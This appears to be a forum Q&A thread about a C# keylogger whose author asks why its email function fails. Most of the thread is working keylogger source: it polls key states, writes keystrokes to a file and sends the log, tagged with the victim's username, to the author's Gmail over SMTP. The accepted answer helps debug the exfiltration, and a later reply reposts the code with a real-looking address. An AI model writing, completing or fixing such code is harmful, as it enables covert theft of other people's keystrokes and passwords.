# C# Keylogger Mail function

Tags: c#, email, keylogger

I've made myself a keylogger in c# using a console application. (I didn't made this fully myself, just a big part). So the problem in my keylogger is that I'm trying to add a mail function into it but when i spam random keys, they will be written to a specific textfile but it won't be mailed, wich kinda is annoying...

I was wondering if anyone could help me out.

```
class Program
{
    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(int i);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    static string path = (Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\lel.txt");

    static void Main(string[] args)
    {
        Keylogger();
    }

    static void mail()
    {
        while (true)
        {
            string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
            MailMessage mail = new MailMessage();
            mail.To.Add("mymail@gmail.com");
            mail.From = new MailAddress("mymail@gmail.com", "gauthier", System.Text.Encoding.UTF8);
            mail.Subject = "Keylog from " + userName;
            mail.SubjectEncoding = System.Text.Encoding.UTF8;
            mail.Body = "Keylogged!";
            mail.BodyEncoding = System.Text.Encoding.UTF8;
            mail.IsBodyHtml = false;
            mail.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient();
            client.Credentials = new System.Net.NetworkCredential("mymail@gmail.com", "password");
            client.Port = 587;
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            Attachment data = new Attachment(path);
            mail.Attachments.Add(data);
            client.Send(mail);
        }
    }

    static void Keylogger()
    {
        StreamWriter sw = new StreamWriter(path);

        while (true)
        {
            Thread.Sleep(50);
            for (Int32 i = 0; i < 255; i++)
            {

                int KeySt = GetAsyncKeyState(i);

                if (KeySt == 1 || KeySt == -32767)
                {

                    if (((Keys)i) == Keys.A)
                    {
                        sw.Write("a");
                    }

                    else if (((Keys)i) == Keys.B)
                    {
                        sw.Write("b");
                    }

                    else if (((Keys)i) == Keys.C)
                    {
                        sw.Write("c");
                    }

                    else if (((Keys)i) == Keys.D)
                    {
                        sw.Write("d");
                    }

                    else if (((Keys)i) == Keys.E)
                    {
                        sw.Write("e");
                    }

                    else if (((Keys)i) == Keys.F)
                    {
                        sw.Write("f");
                    }

                    else if (((Keys)i) == Keys.G)
                    {
                        sw.Write("g");
                    }

                    else if (((Keys)i) == Keys.H)
                    {
                        sw.Write("h");
                    }

                    else if (((Keys)i) == Keys.I)
                    {
                        sw.Write("i");
                    }

                    else if (((Keys)i) == Keys.J)
                    {
                        sw.Write("j");
                    }

                    else if (((Keys)i) == Keys.K)
                    {
                        sw.Write("k");
                    }

                    else if (((Keys)i) == Keys.L)
                    {
                        sw.Write("l");
                    }

                    else if (((Keys)i) == Keys.M)
                    {
                        sw.Write("m");
                    }

                    else if (((Keys)i) == Keys.N)
                    {
                        sw.Write("n");
                    }

                    else if (((Keys)i) == Keys.O)
                    {
                        sw.Write("o");
                    }

                    else if (((Keys)i) == Keys.P)
                    {
                        sw.Write("p");
                    }

                    else if (((Keys)i) == Keys.Q)
                    {
                        sw.Write("q");
                    }

                    else if (((Keys)i) == Keys.R)
                    {
                        sw.Write("r");
                    }

                    else if (((Keys)i) == Keys.S)
                    {
                        sw.Write("s");
                    }

                    else if (((Keys)i) == Keys.T)
                    {
                        sw.Write("t");
                    }

                    else if (((Keys)i) == Keys.U)
                    {
                        sw.Write("u");
                    }

                    else if (((Keys)i) == Keys.V)
                    {
                        sw.Write("v");
                    }

                    else if (((Keys)i) == Keys.W)
                    {
                        sw.Write("w");
                    }

                    else if (((Keys)i) == Keys.X)
                    {
                        sw.Write("x");
                    }

                    else if (((Keys)i) == Keys.Y)
                    {
                        sw.Write("y");
                    }

                    else if (((Keys)i) == Keys.Z)
                    {
                        sw.Write("z");
                    }

                    else if (((Keys)i) == Keys.Enter)
                    {
                        sw.Write(Environment.NewLine);
                    }

                    else if (((Keys)i) == Keys.Space)
                    {
                        sw.Write(" ");
                    }

                    else if (((Keys)i) == Keys.NumPad0)
                    {
                        sw.Write("0");
                    }

                    else if (((Keys)i) == Keys.NumPad1)
                    {
                        sw.Write("1");
                    }

                    else if (((Keys)i) == Keys.NumPad2)
                    {
                        sw.Write("2");
                    }

                    else if (((Keys)i) == Keys.NumPad3)
                    {
                        sw.Write("3");
                    }

                    else if (((Keys)i) == Keys.NumPad4)
                    {
                        sw.Write("4");
                    }

                    else if (((Keys)i) == Keys.NumPad5)
                    {
                        sw.Write("5");
                    }

                    else if (((Keys)i) == Keys.NumPad6)
                    {
                        sw.Write("6");
                    }

                    else if (((Keys)i) == Keys.NumPad7)
                    {
                        sw.Write("7");
                    }
                    else if (((Keys)i) == Keys.NumPad8)
                    {
                        sw.Write("8");
                    }
                    else if (((Keys)i) == Keys.NumPad9)
                    {
                        sw.Write("9");
                    }

                    else if (((Keys)i) == Keys.CapsLock)
                    {
                        sw.Write("[CL]");
                    }

                    sw.Flush();
                }
            }

        }
    }

}
```

Comment: `while(true)` send an email? No!!!

Answer (score 1, accepted):

You don't call your `mail()` method anywhere in the code. Which is a good thing, because it would end up in an infinite loop, and you'll probably get blocked by Gmail because you send so many mails. I'd throw a long `Thread.Sleep()` in there somewhere.

Answer (score 0):

Nothing special is in my console. This is my source code:

```
class Program
{
    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(int i);

    static string path = (Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\lel.txt");

    static void Main(string[] args)
    {
        Keylogger();
        mail();
    }

    static void mail()
    {
        Thread.Sleep(60000);
        string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
        MailMessage mail = new MailMessage();
        mail.To.Add("gauthier.cremers1@gmail.com");
        mail.From = new MailAddress("gauthier.cremers1@gmail.com", "gauthier", System.Text.Encoding.UTF8);
        mail.Subject = "Keylog from " + userName;
        mail.SubjectEncoding = System.Text.Encoding.UTF8;
        mail.Body = "Keylogged!";
        mail.BodyEncoding = System.Text.Encoding.UTF8;
        mail.IsBodyHtml = false;
        mail.Priority = MailPriority.High;
        SmtpClient client = new SmtpClient();
        client.Credentials = new System.Net.NetworkCredential("gauthier.cremers1@gmail.com", "password");
        client.Port = 587;
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        Attachment data = new Attachment(path);
        mail.Attachments.Add(data);

        client.Send(mail);

    }

    static void Keylogger()
    {
        StreamWriter sw = new StreamWriter(path);

        while (true)
        {
            Thread.Sleep(50);
            for (Int32 i = 0; i < 255; i++)
            {

                int KeySt = GetAsyncKeyState(i);

                if (KeySt == 1 || KeySt == -32767)
                {

                    if (((Keys)i) == Keys.A)
                    {
                        sw.Write("a");
                    }

                    else if (((Keys)i) == Keys.B)
                    {
                        sw.Write("b");
                    }

                    else if (((Keys)i) == Keys.C)
                    {
                        sw.Write("c");
                    }

                    else if (((Keys)i) == Keys.D)
                    {
                        sw.Write("d");
                    }

                    else if (((Keys)i) == Keys.E)
                    {
                        sw.Write("e");
                    }

                    else if (((Keys)i) == Keys.F)
                    {
                        sw.Write("f");
                    }

                    else if (((Keys)i) == Keys.G)
                    {
                        sw.Write("g");
                    }

                    else if (((Keys)i) == Keys.H)
                    {
                        sw.Write("h");
                    }

                    else if (((Keys)i) == Keys.I)
                    {
                        sw.Write("i");
                    }

                    else if (((Keys)i) == Keys.J)
                    {
                        sw.Write("j");
                    }

                    else if (((Keys)i) == Keys.K)
                    {
                        sw.Write("k");
                    }

                    else if (((Keys)i) == Keys.L)
                    {
                        sw.Write("l");
                    }

                    else if (((Keys)i) == Keys.M)
                    {
                        sw.Write("m");
                    }

                    else if (((Keys)i) == Keys.N)
                    {
                        sw.Write("n");
                    }

                    else if (((Keys)i) == Keys.O)
                    {
                        sw.Write("o");
                    }

                    else if (((Keys)i) == Keys.P)
                    {
                        sw.Write("p");
                    }

                    else if (((Keys)i) == Keys.Q)
                    {
                        sw.Write("q");
                    }

                    else if (((Keys)i) == Keys.R)
                    {
                        sw.Write("r");
                    }

                    else if (((Keys)i) == Keys.S)
                    {
                        sw.Write("s");
                    }

                    else if (((Keys)i) == Keys.T)
                    {
                        sw.Write("t");
                    }

                    else if (((Keys)i) == Keys.U)
                    {
                        sw.Write("u");
                    }

                    else if (((Keys)i) == Keys.V)
                    {
                        sw.Write("v");
                    }

                    else if (((Keys)i) == Keys.W)
                    {
                        sw.Write("w");
                    }

                    else if (((Keys)i) == Keys.X)
                    {
                        sw.Write("x");
                    }

                    else if (((Keys)i) == Keys.Y)
                    {
                        sw.Write("y");
                    }

                    else if (((Keys)i) == Keys.Z)
                    {
                        sw.Write("z");
                    }

                    else if (((Keys)i) == Keys.Enter)
                    {
                        sw.Write(Environment.NewLine);
                    }

                    else if (((Keys)i) == Keys.Space)
                    {
                        sw.Write(" ");
                    }

                    else if (((Keys)i) == Keys.NumPad0)
                    {
                        sw.Write("0");
                    }

                    else if (((Keys)i) == Keys.NumPad1)
                    {
                        sw.Write("1");
                    }

                    else if (((Keys)i) == Keys.NumPad2)
                    {
                        sw.Write("2");
                    }

                    else if (((Keys)i) == Keys.NumPad3)
                    {
                        sw.Write("3");
                    }

                    else if (((Keys)i) == Keys.NumPad4)
                    {
                        sw.Write("4");
                    }

                    else if (((Keys)i) == Keys.NumPad5)
                    {
                        sw.Write("5");
                    }

                    else if (((Keys)i) == Keys.NumPad6)
                    {
                        sw.Write("6");
                    }

                    else if (((Keys)i) == Keys.NumPad7)
                    {
                        sw.Write("7");
                    }
                    else if (((Keys)i) == Keys.NumPad8)
                    {
                        sw.Write("8");
                    }
                    else if (((Keys)i) == Keys.NumPad9)
                    {
                        sw.Write("9");
                    }

                    else if (((Keys)i) == Keys.CapsLock)
                    {
                        sw.Write("[CL]");
                    }

                    sw.Flush();
                }
            }

        }
    }
```